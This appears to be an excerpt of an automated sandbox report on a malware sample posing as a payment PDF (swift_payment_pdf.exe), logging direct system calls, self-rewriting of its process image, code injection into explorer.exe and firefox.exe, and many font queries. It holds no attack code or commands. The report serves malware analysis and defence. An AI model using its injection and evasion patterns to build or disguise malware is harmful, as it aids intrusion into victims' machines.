            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01358AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013A6AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01388A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Memory written: C:\Users\user\Desktop\swift_payment_pdf.exe base: 400000 value starts with: 4D5A
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Memory written: PID: 7980 base: 2EE0000 value: 00
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Memory written: PID: 7980 base: 2DF82D8 value: 00
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Memory written: PID: 7980 base: 2DF91E8 value: 00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Section loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: read write
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 8156
            Source: C:\Windows\SysWOW64\explorer.exe | Thread APC queued: target process: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Process created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
            Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Users\user\Desktop\swift_payment_pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
